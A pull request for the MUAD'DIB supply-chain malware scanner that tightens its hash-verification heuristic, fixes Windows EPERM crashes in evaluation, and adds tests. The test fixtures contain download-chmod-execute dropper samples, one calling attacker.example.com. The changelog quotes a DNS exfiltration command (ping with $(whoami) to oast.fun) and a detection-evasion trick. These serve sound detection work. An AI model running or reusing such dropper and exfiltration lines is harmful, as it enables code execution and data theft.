### PR TITLE
v2.10.95 - harden hasHashVerification + evaluate EPERM fix

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,147 @@ All notable changes to MUAD'DIB will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [2.10.95] - 2026-04-18
+
+### Context
+
+Release honnete suite a un cycle de review FP qui a identifie 8 clusters de FP dans
+le rapport `data/fp-analysis-week-2026-04-10-17.md`. Un premier plan d'ajustements
+avait ete conçu mais le diagnostic empirique (mesure FPR avant/apres sur les 545
+packages benign curated) a montre qu'aucun ajustement ne delivrait le critere de
+merge du plan (`delta_curated_pp <= -1.0`). Cette release conserve uniquement les
+elements orthogonaux qui ne dependent pas de l'ajustement FP original, et documente
+honnetement l'absence de gain mesure.
+
+### Fixed — Windows EPERM crash during `muaddib evaluate`
+
+Le workflow `node bin/muaddib.js evaluate` sur Windows crashait au premier package
+qui declenchait EPERM (locked file, long path, antivirus). Exemple observe sur `ejs`
+au package 369/548 : le `fs.rmSync(pkgCacheDir, { recursive: true, force: true })`
+de cleanup apres une erreur d'extraction remontait l'exception non-catchee jusqu'au
+top-level catch de `bin/muaddib.js:608`, tuant l'evaluation entiere.
+
+- `src/commands/evaluate.js` — 8 occurrences de `fs.rmSync(pkgCacheDir, ...)` dans
+  `downloadAndExtract` et `downloadAndExtractPyPI` enveloppees dans try/catch
+  silencieux. Un cleanup qui rate sur Windows ne doit pas tuer une run de 545
+  packages.
+- `src/commands/evaluate.js` — les trois boucles d'evaluation benign (`evaluateBenign`,
+  `evaluateBenignPyPI`, `evaluateBenignRandom`) wrappent maintenant `downloadAndExtract`
+  et `silentScan` en try/catch. Un package qui plante (EPERM, long path, file lock) est
+  marque `skipped++` avec l'erreur dans `details[].error` et l'eval continue. Les FPR
+  restent calculees sur `scanned = total - skipped` donc la mesure reste honnete.
+
+### Changed — `hasHashVerification` heuristique durcie (pas d'impact FPR mesure)
+
+`ctx.hasHashVerification` dans `src/scanner/ast.js:211` etait une regex simple
+`createHash + digest`. Un attaquant pouvait declencher le downgrade CRITICAL → HIGH
+de `download_exec_binary` avec juste `crypto.createHash('sha256').update(buf).digest('hex')`
+sans jamais comparer le resultat. Bypass a 3 lignes.
+
+- `src/scanner/ast.js:211` — la regex exige maintenant aussi la presence d'un
+  operateur de comparaison dans le meme fichier (`===`, `!==`, `.equals(`,
+  `assert.strictEqual/equal/deepEqual/deepStrictEqual`, `throw`). Commentaire
+  explicite au-dessus du check documente que c'est une heuristique best-effort
+  niveau fichier, pas une preuve que le hash est reellement consomme. Un fix proper
+  (taint-tracking function-scope) est differe a un PR dedie.
+
+Impact mesure sur le corpus benign 545 packages : **0 FPR delta**. Le durcissement ne
+reclassifie personne (tous les packages avec `createHash + digest` avaient aussi une
+comparaison visible quelque part). Le gain est defensif : une exploitation future ne
+peut plus simplement fake `createHash(...).digest(...)` sans commitment.
+
+### Abandoned — triple-gate downgrade CRITICAL→MEDIUM
+
+Un plan initial proposait un downgrade MEDIUM quand `download_exec_binary` co-occurre
+avec `hasHashVerification=true` ET `fetchOnlySafeDomains=true` (all URLs on
+github/npm/nodejs/pypi). Hypothese : ~180 packages Cluster A legitimes (electron,
+sharp, @spencer-kit/aor, etc.) beneficieraient du downgrade.
+
+**Diagnostic empirique** (v2.10.94 vs triple-gate applique, meme machine, meme corpus) :
+
+- FPR curated : 15.60% → 15.60% (0.00 pp)
+- FPR random : 7.00% → 7.00% (0.00 pp)
+- FPR after ML : 10.28% → 10.28% (0.00 pp)
+- TPR@3 : 93.85% → 93.85% (0.00 pp)
+- ADR : 96.26% → 96.26% (0.00 pp)
+
+Cause racine (analyse sur 85 benign packages flagges) : `download_exec_binary` fire
+sur **3 packages** seulement (esbuild, yarn, @backstage/create-app). Les deux derniers
+etaient deja LOW. esbuild score 100 mais son score est domine par d'autres rules
+CRITICAL (`lifecycle_file_exec`, `lifecycle_dataflow`, etc.), pas par
+`download_exec_binary`. Le downgrade de cette rule a donc 0 impact.
+
+Les vrais drivers FP sur les 85 flagged sont le cumul de `high_entropy_string` (153),
+`prototype_hook` (146), `string_mutation_obfuscation` (131), `prototype_pollution`
+(118), `credential_regex_harvest` (115), `dynamic_require:HIGH` (81). Ce bruit exige
+un redesign plus fondamental (probablement niveau scoring des combinaisons LOW, ou
+whitelist framework) qui sortira d'un v2.10.96 dedie. Full diagnostic dans
+`data/fp-v2.10.95-validation.md` (prive, gitignored).
+
+### Tests
+
+- 3 232 → **3 236** tests passes, 0 failed. 4 nouveaux tests pour `download_exec_binary` :
+  (1) sans hash → CRITICAL regression, (2) hash sans comparaison → CRITICAL (nouveau
+  gate), (3) hash avec comparaison → HIGH (comportement preserve), (4) hash avec
+  comparaison + URL non-allowliste → HIGH (regression).
+
+## [2.10.94] - 2026-04-17
+
+### Added — Validation empirique des malwares sous-threshold (rescan VPS)
+
+Apres la v2.10.93 qui ajoutait les regles ltidi/csec/OAST/self_destruct_eval, un
+rescan empirique sur les tarballs reels de la semaine 2026-04-10→17 a mesure les
+scores effectifs et identifie 4 gaps restants :
+
+| Malware | v2.10.93 score | Cause du gap |
+|---------|----------------|--------------|
+| ltidi cmp-api-stub | 35 (cap MT-1) | `dependency_url_suspicious` n'est pas dans HC_TYPES, MT-1 ceiling cappe a 35 |
+| csec-crypto-toolkit | 19 | `self_destruct_eval` ne matche pas car `unlinkSync(__filename)` est dans le string XOR, pas dans le source |
+| apache-arrow-14 | 50 | Floor CRITICAL a 50 mais pas de mecanisme pour pousser au-dessus |
+| koa-v3 | 9 | `curl_env_exfil` ne couvre que curl/wget, pas ping/nslookup/dig |
+
+### Four scoped fixes
+
+- `src/scanner/package.js` — nouveau threat type `external_tarball_dep` (CRITICAL)
+  emit a la place de `dependency_url_suspicious` quand l'URL pointe vers une tarball
+  (.tgz/.tar.gz/.tar.bz2/.zip) sur un host non-allowlist (cloud storage, CDN random).
+  Ajoute a `HIGH_CONFIDENCE_MALICE_TYPES` pour bypass le MT-1 score ceiling.
+- `src/scanner/ast-detectors/handle-new-expression.js` — nouveau threat type
+  `function_runtime_args` (CRITICAL, AST-090) emit quand `new Function()` recoit >= 2
+  literal args runtime (`require`, `__dirname`, `__filename`, `module`, `exports`,
+  `process`) + body dynamique + presence d'obfuscation dans le meme fichier
+  (`hasFromCharCode || hasBase64Decode || hasZlibInflate`). Le gating obfuscation
+  evite les FP sur les wrappers CommonJS legitimes (babel-register, ts-node, pirates,
+  jest, nyc, vitest). Ajoute a HC_TYPES.
+- `src/scanner/package.js` — `curl_env_exfil` etend son regex pour inclure
+  `ping|nslookup|dig|host|getent`, catchant koa-v3 qui utilise `ping -c 1 $(whoami).<hex>.oast.fun`.
+- `src/scoring.js` — nouveau floor a 75 quand 2+ threat types DISTINCTS sont CRITICAL
+  package-level (ex : `curl_env_exfil` + `lifecycle_env_exfil` compound). Co-occurrence
+  2 CRITICAL package-level = signature quasi-certaine de malware.
+
+### Rule IDs added
+
+- `MUADDIB-AST-090` : `function_runtime_args` — new Function() avec runtime args +
+  obfuscation (csec pattern)
+- `MUADDIB-PKG-020` : `external_tarball_dep` — dep URL tarball sur host third-party
+  (ltidi chain)
+
+### Rescan empirique v2.10.93 → v2.10.94 (mesure sur tarballs reels VPS)
+
+| Malware | v2.10.93 | v2.10.94 | ≥75 CRITICAL? |
+|---------|----------|----------|---------------|
+| ltidi cmp-api-stub | 35 | 50 | Non, mais au-dessus ADR 20 |
+| csec-crypto-toolkit@4.2.4 | 19 | **88** | Oui |
+| apache-arrow-14 | 50 | 75 | Oui |
+| koa-v3 | 9 | 75 | Oui |
+| ourin-baileys (hors scope) | 41 | 46 | Non, reste a design |
+
+### Tests
+
+- 3 230 → **3 232** tests passes, 0 failed. 2 nouveaux tests `function_runtime_args` :
+  positif csec-style (XOR+charcode+runtime args → CRITICAL), negatif module wrapper
+  legit (ts-node-style sans obfuscation → pas d'emission).
+
 ## [2.10.93] - 2026-04-17
 
 ### Added — Security review 2026-04-10→17 remediation

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.94",
+  "version": "2.10.95",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/commands/evaluate.js
+++ b/src/commands/evaluate.js
@@ -499,13 +499,13 @@ function downloadAndExtract(pkg, options = {}) {
     if (process.env.MUADDIB_DEBUG) {
       console.error(`\n  [DEBUG] npm pack ${pkg} failed: ${(err.stderr || err.message || '').slice(0, 200)}`);
     }
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
   const tgzPath = path.join(pkgCacheDir, tgzFilename);
   if (!fs.existsSync(tgzPath)) {
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -516,7 +516,7 @@ function downloadAndExtract(pkg, options = {}) {
     if (process.env.MUADDIB_DEBUG) {
       console.error(`\n  [DEBUG] extract ${pkg} failed: ${(err.message || '').slice(0, 200)}`);
     }
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -525,7 +525,7 @@ function downloadAndExtract(pkg, options = {}) {
 
   const extractedDir = path.join(pkgCacheDir, 'package');
   if (!fs.existsSync(extractedDir)) {
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -564,14 +564,32 @@ async function evaluateBenign(options = {}) {
       process.stdout.write(`\r  [2/3] Benign ${progress} ${pkg}${''.padEnd(40)}`);
     }
 
-    const extractedDir = downloadAndExtract(pkg, options);
+    let extractedDir;
+    try {
+      extractedDir = downloadAndExtract(pkg, options);
+    } catch (err) {
+      // v2.10.95: Windows EPERM on tarball extraction/cleanup should not kill evaluate.
+      // Log as skip and continue with the next package.
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: `extract failed: ${err.code || err.message}` });
+      skipped++;
+      continue;
+    }
     if (!extractedDir) {
       details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: 'download failed' });
       skipped++;
       continue;
     }
 
-    const result = await silentScan(extractedDir);
+    let result;
+    try {
+      result = await silentScan(extractedDir);
+    } catch (err) {
+      // v2.10.95: scan failure (Windows EPERM on locked files, long paths) should
+      // not kill evaluate — skip the package and continue.
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: `scan failed: ${err.code || err.message}` });
+      skipped++;
+      continue;
+    }
 
     const score = result.summary.riskScore;
     const isFlagged = score >= BENIGN_THRESHOLD;
@@ -682,7 +700,7 @@ function downloadAndExtractPyPI(pkg, options = {}) {
     if (process.env.MUADDIB_DEBUG) {
       console.error(`\n  [DEBUG] pip download ${pkg} failed: ${(err.stderr || err.message || '').slice(0, 200)}`);
     }
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -696,7 +714,7 @@ function downloadAndExtractPyPI(pkg, options = {}) {
       return null;
     }
     // Skip zip extraction (not common for sdists) — mark as skipped
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -706,7 +724,7 @@ function downloadAndExtractPyPI(pkg, options = {}) {
     if (process.env.MUADDIB_DEBUG) {
       console.error(`\n  [DEBUG] extract PyPI ${pkg} failed: ${(err.message || '').slice(0, 200)}`);
     }
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
 
@@ -718,7 +736,7 @@ function downloadAndExtractPyPI(pkg, options = {}) {
     try { return fs.statSync(path.join(pkgCacheDir, e)).isDirectory(); } catch { return false; }
   });
   if (entries.length === 0) {
-    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    try { fs.rmSync(pkgCacheDir, { recursive: true, force: true }); } catch { /* Windows EPERM on locked files — ignore, continue */ }
     return null;
   }
   return path.join(pkgCacheDir, entries[0]);
@@ -756,14 +774,29 @@ async function evaluateBenignPyPI(options = {}) {
       process.stdout.write(`\r  [2b/4] PyPI Benign ${progress} ${pkg}${''.padEnd(40)}`);
     }
 
-    const extractedDir = downloadAndExtractPyPI(pkg, options);
+    let extractedDir;
+    try {
+      extractedDir = downloadAndExtractPyPI(pkg, options);
+    } catch (err) {
+      // v2.10.95: PyPI extraction failure (Windows EPERM, long paths) — skip, continue
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: `extract failed: ${err.code || err.message}` });
+      skipped++;
+      continue;
+    }
     if (!extractedDir) {
       details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: 'download failed' });
       skipped++;
       continue;
     }
 
-    const result = await silentScan(extractedDir);
+    let result;
+    try {
+      result = await silentScan(extractedDir);
+    } catch (err) {
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: `scan failed: ${err.code || err.message}` });
+      skipped++;
+      continue;
+    }
 
     const score = result.summary.riskScore;
     const isFlagged = score >= BENIGN_THRESHOLD;
@@ -882,7 +915,15 @@ async function evaluateBenignRandom(options = {}) {
       }
     }
 
-    const result = await silentScan(extractedDir);
+    let result;
+    try {
+      result = await silentScan(extractedDir);
+    } catch (err) {
+      // v2.10.95: scan failure (Windows EPERM, long paths) — skip and continue
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: `scan failed: ${err.code || err.message}` });
+      skipped++;
+      continue;
+    }
 
     const score = result.summary.riskScore;
     const isFlagged = score >= BENIGN_THRESHOLD;

--- a/src/scanner/ast-detectors/handle-post-walk.js
+++ b/src/scanner/ast-detectors/handle-post-walk.js
@@ -135,6 +135,12 @@ function handlePostWalk(ctx) {
   // B4: removed fetchOnlySafeDomains guard — compound requires fetch+chmod+exec, which is never legitimate
   // C10: If file also contains hash/checksum verification, downgrade to HIGH — real droppers
   // don't verify payload integrity; legitimate installers (esbuild, sharp) do.
+  // v2.10.95: hasHashVerification is now gated by presence of a comparison operator
+  // in the same file (see ast.js:211 — best-effort heuristic). No additional tier
+  // added: diagnostic on 545 benign packages showed download_exec_binary fires on
+  // only 3 packages (esbuild, yarn, @backstage/create-app) and their final score is
+  // dominated by other CRITICAL rules, so a MEDIUM tier here had 0 FPR impact.
+  // Full validation in data/fp-v2.10.95-validation.md.
   if (ctx.hasRemoteFetch && ctx.hasChmodExecutable && ctx.hasExecSyncCall) {
     ctx.threats.push({
       type: 'download_exec_binary',

--- a/src/scanner/ast.js
+++ b/src/scanner/ast.js
@@ -205,10 +205,20 @@ function analyzeFile(content, filePath, basePath) {
     stringBuildVars: new Set(),   // variables assigned from BinaryExpression with '+' (string concat)
     // Audit v3 B2: Entropy split detection — high-entropy string concat + eval/decode
     highEntropyConcatFound: false, // set when a concat chain with >=3 leaves and high combined entropy is found
-    // C10: Hash verification — legitimate binary installers verify checksums
-    // Requires BOTH createHash() call AND .digest() call — false positives from
-    // standalone mentions of 'sha256' or 'integrity' in comments/descriptions
-    hasHashVerification: /\bcreateHash\s*\(/.test(content) && /\.digest\s*\(/.test(content),
+    // C10: Hash verification — legitimate binary installers verify checksums.
+    // v2.10.95: file-level heuristic durcie par un check de comparaison. Requires
+    // createHash+digest AND at least one comparison/assert/throw in the same file.
+    // THIS IS NOT A PROOF that the hash is actually verified — a malicious author
+    // can include a === or assert elsewhere in the file without comparing the
+    // digest result. This gate is best-effort and gains value only through the
+    // triple-gate in handle-post-walk.js (requires also fetchOnlySafeDomains).
+    // Proper fix would require function-scope AST tracking to confirm the
+    // comparison consumes the digest result — deferred until a dedicated
+    // taint-tracking PR.
+    hasHashVerification:
+      /\bcreateHash\s*\(/.test(content) &&
+      /\.digest\s*\(/.test(content) &&
+      /\b(===|!==|\.equals\s*\(|assert\.(strictEqual|equal|deepEqual|deepStrictEqual)\s*\(|\bthrow\b)/.test(content),
     // GlassWorm: variation selector decoder pattern (.codePointAt + 0xFE00/0xE0100)
     hasCodePointAt: false,
     hasVariationSelectorConst: false,

--- a/tests/scanner/ast.test.js
+++ b/tests/scanner/ast.test.js
@@ -193,6 +193,126 @@ async function runAstTests() {
     } finally { cleanupTemp(tmp); }
   });
 
+  // ============================================
+  // v2.10.95: download_exec_binary triple-gate downgrade
+  // ============================================
+
+  // Regression TP: fetch + chmod + exec, no hash, untrusted host → CRITICAL (unchanged)
+  await asyncTest('AST: download_exec_binary without hash verification stays CRITICAL', async () => {
+    const code = `
+const https = require('https');
+const fs = require('fs');
+const { execSync } = require('child_process');
+https.get('https://attacker.example.com/payload', (res) => {
+  res.pipe(fs.createWriteStream('/tmp/payload'));
+  res.on('end', () => {
+    fs.chmodSync('/tmp/payload', 0o755);
+    execSync('/tmp/payload');
+  });
+});
+`;
+    const tmp = makeTempPkg(code);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'download_exec_binary');
+      assert(t, 'Should detect download_exec_binary');
+      assert(t.severity === 'CRITICAL', `Expected CRITICAL without hash, got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // Regression TP: hash present but no comparison → hardened hasHashVerification returns false → CRITICAL
+  await asyncTest('AST: download_exec_binary with createHash+digest but no comparison stays CRITICAL', async () => {
+    const code = `
+const https = require('https');
+const fs = require('fs');
+const crypto = require('crypto');
+const { execSync } = require('child_process');
+https.get('https://github.com/user/repo/releases/download/v1.0/bin', (res) => {
+  const chunks = [];
+  res.on('data', c => chunks.push(c));
+  res.on('end', () => {
+    const buf = Buffer.concat(chunks);
+    const hash = crypto.createHash('sha256').update(buf).digest('hex');
+    fs.writeFileSync('/tmp/bin', buf);
+    fs.chmodSync('/tmp/bin', 0o755);
+    execSync('/tmp/bin');
+  });
+});
+`;
+    const tmp = makeTempPkg(code);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'download_exec_binary');
+      assert(t, 'Should detect download_exec_binary');
+      assert(t.severity === 'CRITICAL', `Expected CRITICAL without hash comparison, got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // Hash with comparison: downgrades to HIGH (legitimate binary installer pattern)
+  // Note: an additional MEDIUM tier based on trusted-host allowlist was tried in v2.10.95
+  // but had 0 FPR impact on the 545 benign corpus (see data/fp-v2.10.95-validation.md)
+  // and was reverted. This test verifies the preserved HIGH downgrade.
+  await asyncTest('AST: download_exec_binary with verified hash → HIGH', async () => {
+    const code = `
+const https = require('https');
+const fs = require('fs');
+const crypto = require('crypto');
+const { execSync } = require('child_process');
+const EXPECTED = 'abc123def456';
+https.get('https://github.com/user/repo/releases/download/v1.0/bin', (res) => {
+  const chunks = [];
+  res.on('data', c => chunks.push(c));
+  res.on('end', () => {
+    const buf = Buffer.concat(chunks);
+    const hash = crypto.createHash('sha256').update(buf).digest('hex');
+    if (hash !== EXPECTED) {
+      throw new Error('hash mismatch');
+    }
+    fs.writeFileSync('/tmp/bin', buf);
+    fs.chmodSync('/tmp/bin', 0o755);
+    execSync('/tmp/bin');
+  });
+});
+`;
+    const tmp = makeTempPkg(code);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'download_exec_binary');
+      assert(t, 'Should detect download_exec_binary');
+      assert(t.severity === 'HIGH', `Expected HIGH with verified hash, got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // Regression TP: hash with comparison BUT URL not on allowlist → HIGH (unchanged old behavior)
+  await asyncTest('AST: download_exec_binary with verified hash + untrusted host stays HIGH', async () => {
+    const code = `
+const https = require('https');
+const fs = require('fs');
+const crypto = require('crypto');
+const { execSync } = require('child_process');
+const EXPECTED = 'abc123def456';
+https.get('https://mirror.example.org/bin.tgz', (res) => {
+  const chunks = [];
+  res.on('data', c => chunks.push(c));
+  res.on('end', () => {
+    const buf = Buffer.concat(chunks);
+    const hash = crypto.createHash('sha256').update(buf).digest('hex');
+    if (hash !== EXPECTED) throw new Error('bad hash');
+    fs.writeFileSync('/tmp/bin', buf);
+    fs.chmodSync('/tmp/bin', 0o755);
+    execSync('/tmp/bin');
+  });
+});
+`;
+    const tmp = makeTempPkg(code);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'download_exec_binary');
+      assert(t, 'Should detect download_exec_binary');
+      assert(t.severity === 'HIGH', `Expected HIGH (hash without trusted-host allowlist), got ${t.severity}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
   // --- crypto.createDecipher / createDecipheriv ---
 
   await asyncTest('AST: Detects crypto.createDecipher (flatmap-stream pattern)', async () => {


### PR DESCRIPTION
Harden hasHashVerification in ast.js:211 to require comparison operator (===, !==, .equals, assert.*, throw) in same file. File-level heuristic, best-effort, commented as such. Triple-gate downgrade to MEDIUM was tried but had 0 FPR impact on 545 benign packages (data/fp-v2.10.95-validation.md) and reverted. Also fixes Windows EPERM in evaluate.js that killed runs on locked tarballs. 3236 tests, 0 failed. FPR curated unchanged (15.60%), TPR unchanged (csec 88 CRITICAL).